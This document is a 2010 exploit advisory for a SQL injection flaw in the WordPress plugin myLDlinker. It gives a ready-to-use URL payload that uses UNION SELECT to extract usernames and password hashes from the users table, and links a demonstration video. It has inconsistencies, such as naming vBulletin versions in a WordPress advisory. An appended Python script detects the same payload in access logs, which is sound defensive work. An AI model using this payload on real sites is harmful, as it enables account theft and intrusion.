WordPress 3.0.1 plugin myLDlinker ( SQL Injection Vulnerability )

2010-10-20 / 2010-10-21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################################################
[+] Exploit Title: WordPress 3.0.1 plugin myLDlinker ( SQL Injection Vulnerability )
[+] Author: Ajax Security Team
[+] Version: vBulletin [ 2.9 - 3.0.1 ]
[+] Tested on: WordPress 3.0.1 plugin myLDlinker
#################################################################
###########################[ Exploit ]###########################
[ Exploit ]
{ myLDlinker.php?url=[SQL] }
Http://target.com/myLDlinker.php?url=-255 union select group_concat(user_login,0x3a,user_pass) from wp-users--
[ / Exploit ]
###########################[ Exploit ]###########################
Video : http://ajaxtm.com/forum/up/wp%28ajaxtm.com%29.rar
References : http://www.ajaxtm.com/forum/آمورش-های-تصویری-تیم/130-باگ-جدید-در-پلاگین-ورد-پرس.html
#################################################################
BY : Cair3x [Cair3x.Support@Gmail.com]
Web Site : Ajaxtm.com
Forum : Http://Ajaxtm.com/forum/
[+] Greetz to All Ajaxtm Security Member
HUrr!c4nE - black.shadowes - hadihadi - iM4n - irsdl - the-0utl4w - Expl0its - Mormoroth - Mikili - Black.Spook - S3Ri0uS - Zalatan - Net.Edit0r - Ciph3r - A.u.r.A
#################################################################

References:

http://ajaxtm.com/
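
A detection sketch for the request pattern shown in the advisory, added here as an example; it is not part of the original advisory or the plugin's code. It assumes combined-format web access logs and that legitimate `url` values are plain integers (suggested by the `-255` in the proof of concept, not confirmed by the page); the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Oct/2010:10:01:02 +0000] "GET /myLDlinker.php?url=42 HTTP/1.1" 200 512',
    '203.0.113.9 - - [20/Oct/2010:10:01:07 +0000] "GET /myLDlinker.php?url=-255%20union%20select'
    '%20group_concat(user_login,0x3a,user_pass)%20from%20wp-users-- HTTP/1.1" 200 2048',
    '198.51.100.20 - - [20/Oct/2010:10:01:30 +0000] "GET /myLDlinker.php?url=12abc HTTP/1.1" 404 300',
    '198.51.100.7 - - [20/Oct/2010:10:02:00 +0000] "GET /index.php?url=union HTTP/1.1" 200 900',
]

# Client address, then the request target between the method and the HTTP version.
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (.+) HTTP/[\d.]+"')
# Markers seen in the advisory's proof of concept: UNION ... SELECT and SQL comments.
SQL_MARKERS = re.compile(r"\bunion\b.+\bselect\b|--|/\*|'", re.IGNORECASE)
# Assumption: a legitimate `url` value is a non-negative integer id.
PLAIN_INT = re.compile(r"\d+")


def classify(line):
    """Return (client, reason, decoded_value) for a suspicious request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/myldlinker.php"):
        return None
    # parse_qs percent-decodes, so encoded spaces do not hide the keywords.
    for value in parse_qs(parts.query, keep_blank_values=True).get("url", []):
        if SQL_MARKERS.search(value):
            return (client, "sql-markers", value)
        if not PLAIN_INT.fullmatch(value):
            return (client, "non-numeric", value)
    return None


def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for client, reason, value in scan(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{value}")
```

Hits tagged `sql-markers` warrant a check of the response size and of the accounts in the users table; `non-numeric` hits depend on the integer assumption and need tuning against real traffic.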


Copyright 2024, cxsecurity.com